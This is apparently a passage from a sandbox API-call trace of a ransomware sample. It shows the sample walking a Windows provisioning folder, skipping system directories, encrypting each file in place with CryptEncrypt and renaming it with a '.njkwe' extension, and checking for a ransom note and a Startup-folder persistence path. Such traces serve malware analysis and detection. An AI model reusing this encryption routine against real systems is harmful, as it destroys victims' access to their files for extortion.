nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0x380ed10*, lpNumberOfBytesWritten=0x380edc4*=0x80, lpOverlapped=0x0) returned 1 [0079.141] WriteFile (in: hFile=0x43c, lpBuffer=0x40603c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0x40603c*, lpNumberOfBytesWritten=0x380edc4*=0x4, lpOverlapped=0x0) returned 1 [0079.141] CloseHandle (hObject=0x43c) returned 1 [0079.141] GetProcessHeap () returned 0xbe0000 [0079.141] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x400) returned 0xc472e0 [0079.141] wnsprintfW (in: pszDest=0xc472e0, cchDest=512, pszFmt="%s_%S_{%6S}%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\412__Connections_Cellular_Yoigo (Spain)_i0$(__MVID)@WAP.provxml_r00t_{3sXlE5}.njkwe") returned 177 [0079.141] MoveFileW (lpExistingFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\412__Connections_Cellular_Yoigo (Spain)_i0$(__MVID)@WAP.provxml" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\412__connections_cellular_yoigo (spain)_i0$(__mvid)@wap.provxml"), lpNewFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\412__Connections_Cellular_Yoigo (Spain)_i0$(__MVID)@WAP.provxml_r00t_{3sXlE5}.njkwe" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\412__connections_cellular_yoigo (spain)_i0$(__mvid)@wap.provxml_r00t_{3sxle5}.njkwe")) returned 1 [0079.142] GetProcessHeap () returned 0xbe0000 [0079.142] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc472e0 | out: hHeap=0xbe0000) returned 1 [0079.142] FindNextFileW (in: hFindFile=0xc19f20, lpFindFileData=0x380ee00 | out: lpFindFileData=0x380ee00*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x90f18f32, ftCreationTime.dwHighDateTime=0x1d2e96f, ftLastAccessTime.dwLowDateTime=0x90f18f32, ftLastAccessTime.dwHighDateTime=0x1d2e96f, ftLastWriteTime.dwLowDateTime=0x90f18f32, ftLastWriteTime.dwHighDateTime=0x1d2e96f, nFileSizeHigh=0x0, nFileSizeLow=0x2ca, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="413__Connections_Cellular_DIALOG (Sri Lanka)_i0$(__MVID)@WAP.provxml", cAlternateFileName="413__C~1.PRO")) returned 1 [0079.142] lstrcmpiW (lpString1="413__Connections_Cellular_DIALOG (Sri Lanka)_i0$(__MVID)@WAP.provxml", lpString2="Windows") returned -1 [0079.142] lstrcmpiW (lpString1="413__Connections_Cellular_DIALOG (Sri Lanka)_i0$(__MVID)@WAP.provxml", lpString2="$Recycle.bin") returned 1 [0079.142] lstrcmpiW (lpString1="413__Connections_Cellular_DIALOG (Sri Lanka)_i0$(__MVID)@WAP.provxml", lpString2="System Volume Information") returned -1 [0079.142] lstrcmpiW (lpString1="413__Connections_Cellular_DIALOG (Sri Lanka)_i0$(__MVID)@WAP.provxml", lpString2="Program Files") returned -1 [0079.142] lstrcmpiW (lpString1="413__Connections_Cellular_DIALOG (Sri Lanka)_i0$(__MVID)@WAP.provxml", lpString2="Program Files (x86)") returned -1 [0079.142] wnsprintfW (in: pszDest=0xc46ed8, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\413__Connections_Cellular_DIALOG (Sri Lanka)_i0$(__MVID)@WAP.provxml") returned 162 [0079.142] StrStrIW (lpFirst="413__Connections_Cellular_DIALOG (Sri Lanka)_i0$(__MVID)@WAP.provxml", lpSrch=".njkwe") returned 0x0 [0079.142] lstrcmpW (lpString1="413__Connections_Cellular_DIALOG (Sri Lanka)_i0$(__MVID)@WAP.provxml", lpString2="---==%$$$OPEN_ME_UP$$$==---.txt") returned 1 [0079.142] lstrcmpW (lpString1="413__Connections_Cellular_DIALOG (Sri Lanka)_i0$(__MVID)@WAP.provxml", lpString2="taridd") returned -1 [0079.142] StrCmpNW (lpStr1="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\413__Connecti", lpStr2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\jQ9oAfjNQKea58w4CPypJ91GQq5vB", nChar=107) returned -1 [0079.142] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\413__Connections_Cellular_DIALOG (Sri Lanka)_i0$(__MVID)@WAP.provxml" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\413__connections_cellular_dialog (sri lanka)_i0$(__mvid)@wap.provxml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x43c [0079.143] GetTickCount () returned 0x11541b8 [0079.143] GetTickCount () returned 0x11541b8 [0079.143] GetTickCount () returned 0x11541b8 [0079.143] GetTickCount () returned 0x11541b8 [0079.143] CryptEncrypt (in: hKey=0xbfdd18, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x380ed10*, pdwDataLen=0x380edc0*=0x2c, dwBufLen=0x80 | out: pbData=0x380ed10*, pdwDataLen=0x380edc0*=0x80) returned 1 [0079.143] GetProcessHeap () returned 0xbe0000 [0079.143] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x2800) returned 0xc52870 [0079.143] ReadFile (in: hFile=0x43c, lpBuffer=0xc52870, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc52870*, lpNumberOfBytesRead=0x380edc4*=0x2ca, lpOverlapped=0x0) returned 1 [0079.159] SetFilePointerEx (in: hFile=0x43c, liDistanceToMove=0xfffffd36, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0079.159] WriteFile (in: hFile=0x43c, lpBuffer=0xc52870*, nNumberOfBytesToWrite=0x2ca, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc52870*, lpNumberOfBytesWritten=0x380edc4*=0x2ca, lpOverlapped=0x0) returned 1 [0079.159] GetProcessHeap () returned 0xbe0000 [0079.159] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc52870 | out: hHeap=0xbe0000) returned 1 [0079.159] SetFilePointerEx (in: hFile=0x43c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0079.159] WriteFile (in: hFile=0x43c, lpBuffer=0xc09940*, nNumberOfBytesToWrite=0x300, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc09940*, lpNumberOfBytesWritten=0x380edc4*=0x300, lpOverlapped=0x0) returned 1 [0079.159] WriteFile (in: hFile=0x43c, lpBuffer=0x380ed10*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0x380ed10*, lpNumberOfBytesWritten=0x380edc4*=0x80, lpOverlapped=0x0) returned 1 [0079.159] WriteFile (in: hFile=0x43c, lpBuffer=0x40603c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0x40603c*, lpNumberOfBytesWritten=0x380edc4*=0x4, lpOverlapped=0x0) returned 1 [0079.159] CloseHandle (hObject=0x43c) returned 1 [0079.160] GetProcessHeap () returned 0xbe0000 [0079.160] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x400) returned 0xc472e0 [0079.160] wnsprintfW (in: pszDest=0xc472e0, cchDest=512, pszFmt="%s_%S_{%6S}%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\413__Connections_Cellular_DIALOG (Sri Lanka)_i0$(__MVID)@WAP.provxml_r00t_{3sXlE5}.njkwe") returned 182 [0079.160] MoveFileW (lpExistingFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\413__Connections_Cellular_DIALOG (Sri Lanka)_i0$(__MVID)@WAP.provxml" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\413__connections_cellular_dialog (sri lanka)_i0$(__mvid)@wap.provxml"), lpNewFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\413__Connections_Cellular_DIALOG (Sri Lanka)_i0$(__MVID)@WAP.provxml_r00t_{3sXlE5}.njkwe" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\413__connections_cellular_dialog (sri lanka)_i0$(__mvid)@wap.provxml_r00t_{3sxle5}.njkwe")) returned 1 [0079.161] GetProcessHeap () returned 0xbe0000 [0079.161] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc472e0 | out: hHeap=0xbe0000) returned 1 [0079.161] FindNextFileW (in: hFindFile=0xc19f20, lpFindFileData=0x380ee00 | out: lpFindFileData=0x380ee00*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x90f18f32, ftCreationTime.dwHighDateTime=0x1d2e96f, ftLastAccessTime.dwLowDateTime=0x90f18f32, ftLastAccessTime.dwHighDateTime=0x1d2e96f, ftLastWriteTime.dwLowDateTime=0x90f18f32, ftLastWriteTime.dwHighDateTime=0x1d2e96f, nFileSizeHigh=0x0, nFileSizeLow=0x2cd, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="414__Connections_Cellular_DIALOG (Sri Lanka)_i1$(__MVID)@WAP.provxml", cAlternateFileName="414__C~1.PRO")) returned 1 [0079.161] lstrcmpiW (lpString1="414__Connections_Cellular_DIALOG (Sri Lanka)_i1$(__MVID)@WAP.provxml", lpString2="Windows") returned -1 [0079.161] lstrcmpiW (lpString1="414__Connections_Cellular_DIALOG (Sri Lanka)_i1$(__MVID)@WAP.provxml", lpString2="$Recycle.bin") returned 1 [0079.161] lstrcmpiW (lpString1="414__Connections_Cellular_DIALOG (Sri Lanka)_i1$(__MVID)@WAP.provxml", lpString2="System Volume Information") returned -1 [0079.161] lstrcmpiW (lpString1="414__Connections_Cellular_DIALOG (Sri Lanka)_i1$(__MVID)@WAP.provxml", lpString2="Program Files") returned -1 [0079.161] lstrcmpiW (lpString1="414__Connections_Cellular_DIALOG (Sri Lanka)_i1$(__MVID)@WAP.provxml", lpString2="Program Files (x86)") returned -1 [0079.161] wnsprintfW (in: pszDest=0xc46ed8, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\414__Connections_Cellular_DIALOG (Sri Lanka)_i1$(__MVID)@WAP.provxml") returned 162 [0079.161] StrStrIW (lpFirst="414__Connections_Cellular_DIALOG (Sri Lanka)_i1$(__MVID)@WAP.provxml", lpSrch=".njkwe") returned 0x0 [0079.161] lstrcmpW (lpString1="414__Connections_Cellular_DIALOG (Sri Lanka)_i1$(__MVID)@WAP.provxml", lpString2="---==%$$$OPEN_ME_UP$$$==---.txt") returned 1 [0079.161] lstrcmpW (lpString1="414__Connections_Cellular_DIALOG (Sri Lanka)_i1$(__MVID)@WAP.provxml", lpString2="taridd") returned -1 [0079.161] StrCmpNW (lpStr1="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\414__Connecti", lpStr2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\jQ9oAfjNQKea58w4CPypJ91GQq5vB", nChar=107) returned -1 [0079.161] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\414__Connections_Cellular_DIALOG (Sri Lanka)_i1$(__MVID)@WAP.provxml" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\414__connections_cellular_dialog (sri lanka)_i1$(__mvid)@wap.provxml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x43c [0079.161] GetTickCount () returned 0x11541c8 [0079.161] GetTickCount () returned 0x11541c8 [0079.162] GetTickCount () returned 0x11541c8 [0079.162] GetTickCount () returned 0x11541c8 [0079.162] CryptEncrypt (in: hKey=0xbfdd18, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x380ed10*, pdwDataLen=0x380edc0*=0x2c, dwBufLen=0x80 | out: pbData=0x380ed10*, pdwDataLen=0x380edc0*=0x80) returned 1 [0079.162] GetProcessHeap () returned 0xbe0000 [0079.162] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x2800) returned 0xc52870 [0079.162] ReadFile (in: hFile=0x43c, lpBuffer=0xc52870, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc52870*, lpNumberOfBytesRead=0x380edc4*=0x2cd, lpOverlapped=0x0) returned 1 [0079.164] SetFilePointerEx (in: hFile=0x43c, liDistanceToMove=0xfffffd33, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0079.164] WriteFile (in: hFile=0x43c, lpBuffer=0xc52870*, nNumberOfBytesToWrite=0x2cd, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc52870*, lpNumberOfBytesWritten=0x380edc4*=0x2cd, lpOverlapped=0x0) returned 1 [0079.164] GetProcessHeap () returned 0xbe0000 [0079.164] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc52870 | out: hHeap=0xbe0000) returned 1 [0079.164] SetFilePointerEx (in: hFile=0x43c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0079.164] WriteFile (in: hFile=0x43c, lpBuffer=0xc09940*, nNumberOfBytesToWrite=0x300, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc09940*, lpNumberOfBytesWritten=0x380edc4*=0x300, lpOverlapped=0x0) returned 1 [0079.164] WriteFile (in: hFile=0x43c, lpBuffer=0x380ed10*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0x380ed10*, lpNumberOfBytesWritten=0x380edc4*=0x80, lpOverlapped=0x0) returned 1 [0079.164] WriteFile (in: hFile=0x43c, lpBuffer=0x40603c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0x40603c*, lpNumberOfBytesWritten=0x380edc4*=0x4, lpOverlapped=0x0) returned 1 [0079.164] CloseHandle (hObject=0x43c) returned 1 [0079.164] GetProcessHeap () returned 0xbe0000 [0079.165] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x400) returned 0xc472e0 [0079.165] wnsprintfW (in: pszDest=0xc472e0, cchDest=512, pszFmt="%s_%S_{%6S}%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\414__Connections_Cellular_DIALOG (Sri Lanka)_i1$(__MVID)@WAP.provxml_r00t_{3sXlE5}.njkwe") returned 182 [0079.165] MoveFileW (lpExistingFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\414__Connections_Cellular_DIALOG (Sri Lanka)_i1$(__MVID)@WAP.provxml" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\414__connections_cellular_dialog (sri lanka)_i1$(__mvid)@wap.provxml"), lpNewFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\414__Connections_Cellular_DIALOG (Sri Lanka)_i1$(__MVID)@WAP.provxml_r00t_{3sXlE5}.njkwe" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\414__connections_cellular_dialog (sri lanka)_i1$(__mvid)@wap.provxml_r00t_{3sxle5}.njkwe")) returned 1 [0079.165] GetProcessHeap () returned 0xbe0000 [0079.165] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc472e0 | out: hHeap=0xbe0000) returned 1 [0079.165] FindNextFileW (in: hFindFile=0xc19f20, lpFindFileData=0x380ee00 | out: lpFindFileData=0x380ee00*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x90f18f32, ftCreationTime.dwHighDateTime=0x1d2e96f, ftLastAccessTime.dwLowDateTime=0x90f18f32, ftLastAccessTime.dwHighDateTime=0x1d2e96f, ftLastWriteTime.dwLowDateTime=0x90f18f32, ftLastWriteTime.dwHighDateTime=0x1d2e96f, nFileSizeHigh=0x0, nFileSizeLow=0x280, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="415__Connections_Cellular_Mobitel (Sri Lanka)_i0$(__MVID)@WAP.provxml", cAlternateFileName="415__C~1.PRO")) returned 1 [0079.165] lstrcmpiW (lpString1="415__Connections_Cellular_Mobitel (Sri Lanka)_i0$(__MVID)@WAP.provxml", lpString2="Windows") returned -1 [0079.166] lstrcmpiW (lpString1="415__Connections_Cellular_Mobitel (Sri Lanka)_i0$(__MVID)@WAP.provxml", lpString2="$Recycle.bin") returned 1 [0079.166] lstrcmpiW (lpString1="415__Connections_Cellular_Mobitel (Sri Lanka)_i0$(__MVID)@WAP.provxml", lpString2="System Volume Information") returned -1 [0079.166] lstrcmpiW (lpString1="415__Connections_Cellular_Mobitel (Sri Lanka)_i0$(__MVID)@WAP.provxml", lpString2="Program Files") returned -1 [0079.166] lstrcmpiW (lpString1="415__Connections_Cellular_Mobitel (Sri Lanka)_i0$(__MVID)@WAP.provxml", lpString2="Program Files (x86)") returned -1 [0079.166] wnsprintfW (in: pszDest=0xc46ed8, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\415__Connections_Cellular_Mobitel (Sri Lanka)_i0$(__MVID)@WAP.provxml") returned 163 [0079.166] StrStrIW (lpFirst="415__Connections_Cellular_Mobitel (Sri Lanka)_i0$(__MVID)@WAP.provxml", lpSrch=".njkwe") returned 0x0 [0079.166] lstrcmpW (lpString1="415__Connections_Cellular_Mobitel (Sri Lanka)_i0$(__MVID)@WAP.provxml", lpString2="---==%$$$OPEN_ME_UP$$$==---.txt") returned 1 [0079.166] lstrcmpW (lpString1="415__Connections_Cellular_Mobitel (Sri Lanka)_i0$(__MVID)@WAP.provxml", lpString2="taridd") returned -1 [0079.166] StrCmpNW (lpStr1="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\415__Connecti", lpStr2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\jQ9oAfjNQKea58w4CPypJ91GQq5vB", nChar=107) returned -1 [0079.166] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\415__Connections_Cellular_Mobitel (Sri Lanka)_i0$(__MVID)@WAP.provxml" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\415__connections_cellular_mobitel (sri lanka)_i0$(__mvid)@wap.provxml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x43c [0079.167] GetTickCount () returned 0x11541c8 [0079.167] GetTickCount () returned 0x11541c8 [0079.167] GetTickCount () returned 0x11541c8 [0079.167] GetTickCount () returned 0x11541c8 [0079.167] CryptEncrypt (in: hKey=0xbfdd18, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x380ed10*, pdwDataLen=0x380edc0*=0x2c, dwBufLen=0x80 | out: pbData=0x380ed10*, pdwDataLen=0x380edc0*=0x80) returned 1 [0079.167] GetProcessHeap () returned 0xbe0000 [0079.167] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x2800) returned 0xc52870 [0079.167] ReadFile (in: hFile=0x43c, lpBuffer=0xc52870, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc52870*, lpNumberOfBytesRead=0x380edc4*=0x280, lpOverlapped=0x0) returned 1 [0079.169] SetFilePointerEx (in: hFile=0x43c, liDistanceToMove=0xfffffd80, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0079.170] WriteFile (in: hFile=0x43c, lpBuffer=0xc52870*, nNumberOfBytesToWrite=0x280, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc52870*, lpNumberOfBytesWritten=0x380edc4*=0x280, lpOverlapped=0x0) returned 1 [0079.170] GetProcessHeap () returned 0xbe0000 [0079.170] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc52870 | out: hHeap=0xbe0000) returned 1 [0079.170] SetFilePointerEx (in: hFile=0x43c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0079.170] WriteFile (in: hFile=0x43c, lpBuffer=0xc09940*, nNumberOfBytesToWrite=0x300, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc09940*, lpNumberOfBytesWritten=0x380edc4*=0x300, lpOverlapped=0x0) returned 1 [0079.170] WriteFile (in: hFile=0x43c, lpBuffer=0x380ed10*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0x380ed10*, lpNumberOfBytesWritten=0x380edc4*=0x80, lpOverlapped=0x0) returned 1 [0079.170] WriteFile (in: hFile=0x43c, lpBuffer=0x40603c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0x40603c*, lpNumberOfBytesWritten=0x380edc4*=0x4, lpOverlapped=0x0) returned 1 [0079.170] CloseHandle (hObject=0x43c) returned 1 [0079.170] GetProcessHeap () returned 0xbe0000 [0079.170] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x400) returned 0xc472e0 [0079.170] wnsprintfW (in: pszDest=0xc472e0, cchDest=512, pszFmt="%s_%S_{%6S}%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\415__Connections_Cellular_Mobitel (Sri Lanka)_i0$(__MVID)@WAP.provxml_r00t_{3sXlE5}.njkwe") returned 183 [0079.171] MoveFileW (lpExistingFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\415__Connections_Cellular_Mobitel (Sri Lanka)_i0$(__MVID)@WAP.provxml" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\415__connections_cellular_mobitel (sri lanka)_i0$(__mvid)@wap.provxml"), lpNewFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\415__Connections_Cellular_Mobitel (Sri Lanka)_i0$(__MVID)@WAP.provxml_r00t_{3sXlE5}.njkwe" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\415__connections_cellular_mobitel (sri lanka)_i0$(__mvid)@wap.provxml_r00t_{3sxle5}.njkwe")) returned 1 [0079.171] GetProcessHeap () returned 0xbe0000 [0079.171] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc472e0 | out: hHeap=0xbe0000) returned 1 [0079.171] FindNextFileW (in: hFindFile=0xc19f20, lpFindFileData=0x380ee00 | out: lpFindFileData=0x380ee00*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x90f18f32, ftCreationTime.dwHighDateTime=0x1d2e96f, ftLastAccessTime.dwLowDateTime=0x90f18f32, ftLastAccessTime.dwHighDateTime=0x1d2e96f, ftLastWriteTime.dwLowDateTime=0x90f18f32, ftLastWriteTime.dwHighDateTime=0x1d2e96f, nFileSizeHigh=0x0, nFileSizeLow=0x27e, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="416__Connections_Cellular_Zain (Sudan)_i0$(__MVID)@WAP.provxml", cAlternateFileName="416__C~1.PRO")) returned 1 [0079.171] lstrcmpiW (lpString1="416__Connections_Cellular_Zain (Sudan)_i0$(__MVID)@WAP.provxml", lpString2="Windows") returned -1 [0079.171] lstrcmpiW (lpString1="416__Connections_Cellular_Zain (Sudan)_i0$(__MVID)@WAP.provxml", lpString2="$Recycle.bin") returned 1 [0079.171] lstrcmpiW (lpString1="416__Connections_Cellular_Zain (Sudan)_i0$(__MVID)@WAP.provxml", lpString2="System Volume Information") returned -1 [0079.172] lstrcmpiW (lpString1="416__Connections_Cellular_Zain (Sudan)_i0$(__MVID)@WAP.provxml", lpString2="Program Files") returned -1 [0079.172] lstrcmpiW (lpString1="416__Connections_Cellular_Zain (Sudan)_i0$(__MVID)@WAP.provxml", lpString2="Program Files (x86)") returned -1 [0079.172] wnsprintfW (in: pszDest=0xc46ed8, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\416__Connections_Cellular_Zain (Sudan)_i0$(__MVID)@WAP.provxml") returned 156 [0079.172] StrStrIW (lpFirst="416__Connections_Cellular_Zain (Sudan)_i0$(__MVID)@WAP.provxml", lpSrch=".njkwe") returned 0x0 [0079.172] lstrcmpW (lpString1="416__Connections_Cellular_Zain (Sudan)_i0$(__MVID)@WAP.provxml", lpString2="---==%$$$OPEN_ME_UP$$$==---.txt") returned 1 [0079.172] lstrcmpW (lpString1="416__Connections_Cellular_Zain (Sudan)_i0$(__MVID)@WAP.provxml", lpString2="taridd") returned -1 [0079.172] StrCmpNW (lpStr1="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\416__Connecti", lpStr2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\jQ9oAfjNQKea58w4CPypJ91GQq5vB", nChar=107) returned -1 [0079.172] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\416__Connections_Cellular_Zain (Sudan)_i0$(__MVID)@WAP.provxml" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\416__connections_cellular_zain (sudan)_i0$(__mvid)@wap.provxml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x43c [0079.172] GetTickCount () returned 0x11541d8 [0079.172] GetTickCount () returned 0x11541d8 [0079.172] GetTickCount () returned 0x11541d8 [0079.172] GetTickCount () returned 0x11541d8 [0079.172] CryptEncrypt (in: hKey=0xbfdd18, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x380ed10*, pdwDataLen=0x380edc0*=0x2c, dwBufLen=0x80 | out: pbData=0x380ed10*, pdwDataLen=0x380edc0*=0x80) returned 1 [0079.173] 